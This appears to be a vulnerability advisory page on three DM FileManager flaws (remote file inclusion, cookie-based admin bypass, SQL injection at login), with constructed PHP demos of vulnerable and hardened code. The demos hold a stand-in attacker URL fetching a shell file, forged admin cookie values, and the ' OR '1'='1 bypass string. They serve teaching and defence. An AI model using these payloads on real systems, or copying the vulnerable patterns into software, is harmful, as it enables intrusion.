
CVSS: 6.8 | EPSS: 1% | CPEs: 1 | EXPL: 2

PHP remote file inclusion vulnerability in dm-albums/template/album.php in DM FileManager 3.9.4, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the SECURITY_FILE parameter. The template includes a file named by a variable it never initialises; with register_globals on, the request supplies that variable. Note that register_globals was removed in PHP 5.4, and allow_url_include must also be on for a URL to be fetched and executed, so exposure depends on the PHP configuration as much as on the application code.
References: https://www.exploit-db.com/exploits/9044, http://secunia.com/advisories/35622
CWE-94: Improper Control of Generation of Code ('Code Injection')
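The following is an added illustration of the register_globals inclusion pattern described above. It is not DM FileManager's code: the template logic, the template map and the temporary directory are constructed here, and only the SECURITY_FILE parameter name comes from the advisory. Neither function performs a real include; each returns the path that would be included so the script runs safely.

```php
<?php
// Constructed demonstration (not DM FileManager's code) of how register_globals
// turns an uninitialised include variable into a remote file inclusion, and of
// the fix: the client picks a key from a fixed map, never a path.

// register_globals=On created a global variable for every GET/POST/cookie key
// before any application code ran. This helper mimics that for the demo.
function simulate_register_globals(array $get): void
{
    foreach ($get as $k => $v) {
        $GLOBALS[$k] = $v; // what PHP did automatically under register_globals
    }
}

// Vulnerable: the template assumes a parent script already set $SECURITY_FILE
// and includes it unconditionally. If nothing set it, the request value wins,
// and with allow_url_include=On a URL is fetched and executed as PHP.
function vulnerable_include_target(): ?string
{
    global $SECURITY_FILE;
    return $SECURITY_FILE ?? null;   // real code would do: include $SECURITY_FILE;
}

// Hardened: request data selects a *key* in a server-side map, the file is
// resolved under a fixed base directory, and the result is checked to still
// lie inside that directory. No request value ever becomes a path.
function hardened_include_target(string $baseDir, string $requested): string
{
    $templates = ['album' => 'album.php', 'list' => 'list.php']; // assumed names
    if (!isset($templates[$requested])) {
        throw new RuntimeException('unknown template key');
    }
    $base = realpath($baseDir);
    $path = $base === false ? false : realpath($base . DIRECTORY_SEPARATOR . $templates[$requested]);
    if ($path === false || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('template missing or outside base directory');
    }
    return $path;                    // real code would do: include $path;
}

// --- demo ---
simulate_register_globals(['SECURITY_FILE' => 'http://attacker.example/shell.txt']); // constructed request
echo "vulnerable would include: " . vulnerable_include_target() . "\n";

$tmp = sys_get_temp_dir() . '/rfi-demo-' . getmypid();
mkdir($tmp);
file_put_contents($tmp . '/album.php', "<?php // constructed local template\n");
echo "hardened includes: " . hardened_include_target($tmp, 'album') . "\n";
try {
    hardened_include_target($tmp, 'http://attacker.example/shell.txt');
} catch (RuntimeException $e) {
    echo "hardened rejected: " . $e->getMessage() . "\n";
}
unlink($tmp . '/album.php');
rmdir($tmp);
```

On a legacy interpreter that still has the option, `register_globals = Off` and `allow_url_include = Off` in php.ini remove the precondition for this class of bug, but the code-level fix (initialise every variable you include, and map keys to paths) is what survives a configuration change.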

CVSS: 7.5 | EPSS: 1% | CPEs: 1 | EXPL: 1

admin/login.php in DM FileManager 3.9.2 allows remote attackers to bypass authentication and gain administrative access by setting the (1) USER, (2) GROUPID, (3) GROUP, and (4) USERID cookies to certain values. The application derives identity and group membership from cookie values the client controls and carries no integrity protection, so no password is needed. The fix is to keep identity server-side (an opaque session id in the cookie, user and group in the session store populated only after the password has been verified) or, where state must travel in the cookie, to authenticate it with a server-side key.
References: https://www.exploit-db.com/exploits/8903, http://secunia.com/advisories/35167, http://www.vupen.com/english/advisories/2009/1532
CWE-264: Permissions, Privileges, and Access Controls
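The following is an added illustration of the cookie-trust bypass class described above, with the two usual fixes side by side. It is not DM FileManager's code: the cookie names follow the advisory, while the user record, the session array, the signing key and the exact values checked are constructed assumptions.

```php
<?php
// Constructed demonstration (not DM FileManager's code) of authorisation
// derived from client-supplied cookies, versus server-side sessions and
// HMAC-authenticated cookies.

// Vulnerable: the check reads identity and group straight out of the cookies.
// Anyone can send "Cookie: USER=admin; GROUPID=1; GROUP=admin; USERID=1".
// The specific values are assumed for the demo.
function is_admin_vulnerable(array $cookies): bool
{
    return isset($cookies['USER'], $cookies['GROUPID'], $cookies['GROUP'], $cookies['USERID'])
        && $cookies['GROUPID'] === '1'
        && $cookies['GROUP'] === 'admin';
}

// Hardened, option 1: the browser holds only an opaque session id; user and
// group are written into the server-side session after password verification.
function authenticate(array $users, string $username, string $password, array &$session): bool
{
    if (!isset($users[$username]) || !password_verify($password, $users[$username]['pwhash'])) {
        return false;
    }
    // In a real request, call session_regenerate_id(true) here against fixation.
    $session['user_id'] = $users[$username]['id'];
    $session['group']   = $users[$username]['group'];
    return true;
}

function is_admin_hardened(array $session): bool
{
    return ($session['group'] ?? null) === 'admin';
}

// Hardened, option 2: if claims must live in a cookie, sign them with a key the
// client never sees and reject anything whose MAC does not verify.
function sign_cookie(array $claims, string $key): string
{
    $payload = base64_encode(json_encode($claims));
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

function verify_cookie(string $cookie, string $key): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $mac] = $parts;
    if (!hash_equals(hash_hmac('sha256', $payload, $key), $mac)) { // constant-time compare
        return null;
    }
    $claims = json_decode(base64_decode($payload, true), true);
    return is_array($claims) ? $claims : null;
}

// --- demo with constructed data ---
$users = ['alice' => ['id' => 7, 'group' => 'user', 'pwhash' => password_hash('correct horse', PASSWORD_DEFAULT)]];
$forged = ['USER' => 'admin', 'GROUPID' => '1', 'GROUP' => 'admin', 'USERID' => '1'];
var_dump(is_admin_vulnerable($forged));            // forged cookies are accepted

$session = [];
authenticate($users, 'alice', 'correct horse', $session);
var_dump(is_admin_hardened($session));             // alice is not admin, whatever she sends

$key = random_bytes(32);                           // assumed to come from secure config
$cookie = sign_cookie(['user_id' => 7, 'group' => 'user'], $key);
$tampered = sign_cookie(['user_id' => 7, 'group' => 'admin'], 'guessed-key');
var_dump(verify_cookie($cookie, $key)['group']);   // legitimate cookie verifies
var_dump(verify_cookie($tampered, $key));          // forged cookie is rejected
```

The session route is preferable for an admin panel because it also lets the server revoke access immediately; the signed-cookie route is shown because it is the minimal change when the cookie layout cannot be replaced, and even then the group claim should be re-checked against the database on privileged actions.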

CVSS: 6.8 | EPSS: 0% | CPEs: 1 | EXPL: 2

Multiple SQL injection vulnerabilities in login.php in DM FileManager 3.9.2, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) Username and (2) Password fields. The login query concatenates the submitted values into the SQL string; magic_quotes_gpc merely escaped quotes in request data, so with it off a single quote in either field terminates the string literal. Relying on magic_quotes is not a fix (it was removed in PHP 5.4); the remedy is parameterised queries.
References: https://www.exploit-db.com/exploits/8741, http://osvdb.org/54597, http://secunia.com/advisories/35167, http://www.securityfocus.com/bid/35035
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
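The following is an added, self-contained illustration of the login injection class described above. It is not DM FileManager's code: the table layout, column names, sample user and payload are constructed here, and it uses an in-memory SQLite database through PDO (requires the pdo_sqlite extension).

```php
<?php
// Constructed demonstration (not DM FileManager's code) of a concatenated login
// query that a quote in either field breaks out of, beside the parameterised
// version that is immune regardless of the magic_quotes_gpc setting.

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
    // Plaintext password, as weak legacy applications stored it; the hardened
    // path below still uses a constant-time compare, and real code should store
    // password_hash() output and check it with password_verify().
    $db->exec("INSERT INTO users (username, password) VALUES ('admin', 's3cret')");
    return $db;
}

// Vulnerable: request values are spliced into the SQL text. With
// magic_quotes_gpc=Off the input  ' OR '1'='1  closes the literal and the
// remainder is parsed as SQL, so the WHERE clause is always true.
function login_vulnerable(PDO $db, string $username, string $password): bool
{
    $sql = "SELECT id FROM users WHERE username = '$username' AND password = '$password'";
    return $db->query($sql)->fetch(PDO::FETCH_ASSOC) !== false;
}

// Hardened: bound parameters travel to the engine as data, never as SQL text,
// so quotes in the input are harmless and no escaping layer is needed.
function login_hardened(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT password FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && hash_equals($row['password'], $password);
}

// --- demo ---
$db = make_db();
$payload = "' OR '1'='1";                                 // constructed injection string
var_dump(login_vulnerable($db, $payload, $payload));      // bypass: query matches without credentials
var_dump(login_hardened($db, $payload, $payload));        // rejected: no user named "' OR '1'='1"
var_dump(login_hardened($db, 'admin', 's3cret'));         // legitimate login still works
```

With the payload in both fields the vulnerable function returns true and the hardened one false, while the real credentials succeed in both. Note that the fix does not depend on addslashes() or any quoting configuration; escaping-based defences also fail on multibyte charset edge cases, which is one reason prepared statements are the standard answer.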